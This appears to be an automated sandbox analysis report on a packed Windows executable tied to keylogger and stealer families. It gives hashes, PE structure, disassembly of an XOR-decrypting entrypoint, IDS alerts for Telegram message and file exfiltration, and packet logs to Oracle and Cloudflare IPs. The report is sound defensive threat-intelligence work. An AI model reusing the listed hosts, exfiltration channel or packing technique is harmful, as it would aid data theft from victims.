TELEGRAMRU	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
ORACLE-BMC-31898US	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	lkETeneRL3.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	5qJ6QQTcRS.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	prgNb8YFEA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
CLOUDFLARENETUS	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	Q7QR4k52HL.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	3qr7JBuNuX.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
3b5074b1b5d032e5620f69f9f700ff0e	lrw6UNGsUC.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	JuIZye2xKX.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ty1nyFUMlo.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sS7Jrsk0Z7.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.6923883083010205
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	x8M2g1Xxhz.exe
File size:	2'841'088 bytes
MD5:	6776d32ed5b26c788e25c1632b555d47
SHA1:	ca579bfb0a3a85fd0c234385d1fc5873a19d11a4
SHA256:	8d5ad043ae91a80f57574f52b78402a7497b7377a29ebd2401c1f42ef0c41617
SHA512:	aecb65a4d5d6d645910ce651a3277d97f4a51b145b0edfd1d1c495d6a915acb18a654b6fa81c7d7d57d7ebcb5215286c3df9802f682695f9c06e8ff52e92df12
SSDEEP:	49152:oKQK2r0YVjKDyOSRTzsTSKC7o5lq/Ucqw:nZ2IYVjKDyOSJzJKCse/E
TLSH:	76D52995A40676CFD4CE27B49527CD89685E0BFD872009C3AC69B4BAFE63CC115F6C28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~...................f....PE..L...t..P..........#........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x6b7000
Entrypoint Section:	dqypilex
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5000A574 [Fri Jul 13 22:47:16 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	baa93d47220682c04d92f7797d9224ce

Entrypoint Preview

Instruction
push esi
push eax
push ebx
call 00007FC218B03406h
int3
pop eax
mov ebx, eax
inc eax
sub eax, 0027F000h
sub eax, 100C1744h
add eax, 100C173Bh
cmp byte ptr [ebx], FFFFFFCCh
jne 00007FC218B0341Bh
mov byte ptr [ebx], 00000000h
mov ebx, 00001000h
push 3234C100h
push 6F303CD7h
push ebx
push eax
call 00007FC218B0340Fh
add eax, 14h
mov dword ptr [esp+08h], eax
pop ebx
pop eax
ret
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push esi
mov esi, dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+0Ch]
shr ecx, 02h
mov eax, dword ptr [ebp+10h]
mov ebx, dword ptr [ebp+14h]
test ecx, ecx
je 00007FC218B0340Ch
xor dword ptr [esi], eax
add dword ptr [esi], ebx
add esi, 04h
dec ecx
jmp 00007FC218B033F4h
pop esi
pop ecx
pop ebx
pop eax
leave
retn 0010h
push es
adc byte ptr [edx+273821B5h], FFFFFF8Bh
push edi
movsb
stc
jnle 00007FC218B03382h
lahf
and al, dl
and al, D1h
fidiv dword ptr [esi-24h]
into
cmp edi, ecx
call 00007FC1DBF774B6h
and al, 10h
hlt
leave
mov eax, dword ptr [1A676B08h]
inc ebp
adc bh, byte ptr [edx]
xchg dword ptr [edi+edx-448D94A6h], ebp
jnl 00007FC218B03402h
movsd
arpl word ptr [edi-77h], dx
sub al, 24h
mov ebp, 17A02185h
xor ebx, ebp
pop ebp
push ebx
sub dword ptr [esp], 577930EAh
mov edx, dword ptr [esp]
add esp, 04h
add edx, 577930EAh
sub ebx, esi

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[ C ] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3706d	0x95	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26000	0x10dc8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25000	0x25000	39a55dc4e32921666bbf5847679ea044	False	0.6185269742398649	data	7.0329103548795775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26000	0x10dc8	0x10e00	05d9a7b35903dc76c6403500cdc62098	False	0.9666811342592593	data	7.969706621536402	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x37000	0x1000	0x200	dcad19575a3190349e945eeeebe2d7b4	False	0.17578125	data	1.2793598462581839	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
tzvdltub	0x38000	0x27f000	0x27e800	96f716b33551dc7fbb3d06f404bc9119	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
dqypilex	0x2b7000	0x1000	0x200	e2394b654a38de8df0bab7c5d2c58b68	False	0.55078125	data	4.311529115138432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x26124	0xfd0a	data	1.0004013708357775
RT_RCDATA	0x35e30	0x20	data	1.28125
RT_VERSION	0x35e50	0x31c	data	0.4296482412060301
RT_MANIFEST	0x3616c	0xc5b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.3926651912741069

Imports

DLL	Import
kernel32.dll	lstrcpy
comctl32.dll	InitCommonControls

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T08:08:31.701907+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49747	193.122.130.0	80	TCP
2025-01-11T08:08:32.842548+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49747	193.122.130.0	80	TCP
2025-01-11T08:08:33.448383+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49759	104.21.112.1	443	TCP
2025-01-11T08:08:34.093331+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49761	193.122.130.0	80	TCP
2025-01-11T08:08:36.861925+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49784	104.21.112.1	443	TCP
2025-01-11T08:08:37.928318+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49792	104.21.112.1	443	TCP
2025-01-11T08:08:38.983490+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49802	104.21.112.1	443	TCP
2025-01-11T08:08:40.057813+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49809	104.21.112.1	443	TCP
2025-01-11T08:08:42.078227+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.9	49824	149.154.167.220	443	TCP
2025-01-11T08:08:49.297232+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.9	49874	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:08:31.082309008 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:31.088671923 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:31.088756084 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:31.089056969 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:31.095088959 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:31.552875996 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:31.557692051 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:31.562515020 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:31.658701897 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:31.701906919 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:32.031064034 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.031083107 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.031254053 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.044920921 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.044933081 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.511049032 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.511173010 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.519334078 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.519354105 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.519737005 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.561309099 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.568547964 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.611346006 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.679742098 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.679807901 CET	443	49753	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.680114031 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.686340094 CET	49753	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.697225094 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:32.702152014 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:32.799482107 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:32.801708937 CET	49759	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.801762104 CET	443	49759	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.801845074 CET	49759	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.802156925 CET	49759	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:32.802171946 CET	443	49759	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:32.842547894 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:33.296250105 CET	443	49759	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:33.298928022 CET	49759	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:33.298959017 CET	443	49759	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:33.448422909 CET	443	49759	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:33.448488951 CET	443	49759	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:33.448545933 CET	49759	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:33.449143887 CET	49759	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:33.631829023 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:33.632863045 CET	49761	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:33.636806965 CET	80	49747	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:33.636847973 CET	49747	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:33.637603045 CET	80	49761	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:33.637655020 CET	49761	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:33.637767076 CET	49761	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:33.642533064 CET	80	49761	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:34.093103886 CET	80	49761	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:34.093331099 CET	49761	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:34.094400883 CET	49766	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:34.094450951 CET	443	49766	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:34.094537020 CET	49766	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:34.094780922 CET	49766	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:34.094796896 CET	443	49766	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:34.098340988 CET	80	49761	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:34.098400116 CET	49761	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:34.557732105 CET	443	49766	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:34.559545040 CET	49766	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:34.559582949 CET	443	49766	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:34.687334061 CET	443	49766	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:34.687593937 CET	443	49766	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:34.687691927 CET	49766	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:34.687967062 CET	49766	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:34.692825079 CET	49771	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:34.697715044 CET	80	49771	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:34.697818041 CET	49771	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:34.697932959 CET	49771	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:34.702676058 CET	80	49771	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:35.180303097 CET	80	49771	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:35.181596994 CET	49776	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:35.181639910 CET	443	49776	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:35.181708097 CET	49776	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:35.181946993 CET	49776	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:35.181966066 CET	443	49776	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:35.233200073 CET	49771	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:35.640839100 CET	443	49776	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:35.642447948 CET	49776	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:35.642479897 CET	443	49776	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:35.762336969 CET	443	49776	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:35.762409925 CET	443	49776	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:35.762562990 CET	49776	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:35.763031006 CET	49776	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:35.766545057 CET	49771	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:35.767769098 CET	49779	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:35.771507978 CET	80	49771	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:35.771610975 CET	49771	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:35.772552967 CET	80	49779	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:35.772633076 CET	49779	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:35.772748947 CET	49779	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:35.777527094 CET	80	49779	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:36.223711014 CET	80	49779	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:36.256769896 CET	49784	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:36.256818056 CET	443	49784	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:36.256896973 CET	49784	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:36.257190943 CET	49784	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:36.257205963 CET	443	49784	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:36.264419079 CET	49779	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:36.709156990 CET	443	49784	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:36.710628033 CET	49784	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:36.710642099 CET	443	49784	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:36.862021923 CET	443	49784	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:36.862224102 CET	443	49784	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:36.862277985 CET	49784	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:36.862854958 CET	49784	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:36.867862940 CET	49779	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:36.868865013 CET	49790	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:36.872855902 CET	80	49779	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:36.872908115 CET	49779	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:36.873672009 CET	80	49790	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:36.873766899 CET	49790	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:36.873939991 CET	49790	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:36.878753901 CET	80	49790	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:37.333581924 CET	80	49790	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:37.334757090 CET	49792	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:37.334789991 CET	443	49792	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:37.334904909 CET	49792	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:37.335104942 CET	49792	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:37.335115910 CET	443	49792	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:37.389441967 CET	49790	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:37.807667017 CET	443	49792	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:37.810986042 CET	49792	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:37.811007977 CET	443	49792	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:37.928320885 CET	443	49792	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:37.928390026 CET	443	49792	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:37.928478956 CET	49792	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:37.928937912 CET	49792	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:37.934082031 CET	49790	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:37.934634924 CET	49797	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:37.939068079 CET	80	49790	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:37.939131021 CET	49790	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:37.939436913 CET	80	49797	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:37.939543009 CET	49797	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:37.939665079 CET	49797	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:37.947480917 CET	80	49797	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:38.398200035 CET	80	49797	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:38.399878025 CET	49802	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:38.399925947 CET	443	49802	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:38.399983883 CET	49802	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:38.400259018 CET	49802	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:38.400270939 CET	443	49802	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:38.451903105 CET	49797	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:38.854319096 CET	443	49802	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:38.855899096 CET	49802	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:38.855916023 CET	443	49802	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:38.983529091 CET	443	49802	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:38.983593941 CET	443	49802	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:38.983633041 CET	49802	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:38.984163046 CET	49802	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:38.991542101 CET	49797	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:38.992559910 CET	49808	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:38.996685028 CET	80	49797	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:38.996825933 CET	49797	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:38.997385979 CET	80	49808	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:38.997447968 CET	49808	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:38.997546911 CET	49808	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:39.002321005 CET	80	49808	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:39.460645914 CET	80	49808	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:39.462501049 CET	49809	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:39.462553024 CET	443	49809	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:39.462634087 CET	49809	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:39.463077068 CET	49809	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:39.463088989 CET	443	49809	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:39.514441013 CET	49808	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:39.915182114 CET	443	49809	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:39.917208910 CET	49809	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:39.917241096 CET	443	49809	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:40.057847977 CET	443	49809	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:40.057923079 CET	443	49809	104.21.112.1	192.168.2.9
Jan 11, 2025 08:08:40.057986975 CET	49809	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:40.058495045 CET	49809	443	192.168.2.9	104.21.112.1
Jan 11, 2025 08:08:40.063493967 CET	49808	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:40.064599037 CET	49815	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:40.068454027 CET	80	49808	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:40.068510056 CET	49808	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:40.069427013 CET	80	49815	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:40.069483995 CET	49815	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:40.069653034 CET	49815	80	192.168.2.9	193.122.130.0
Jan 11, 2025 08:08:40.074482918 CET	80	49815	193.122.130.0	192.168.2.9
Jan 11, 2025 08:08:40.527565956 CET	80	49815	193.122.130.0	192.168.2.9
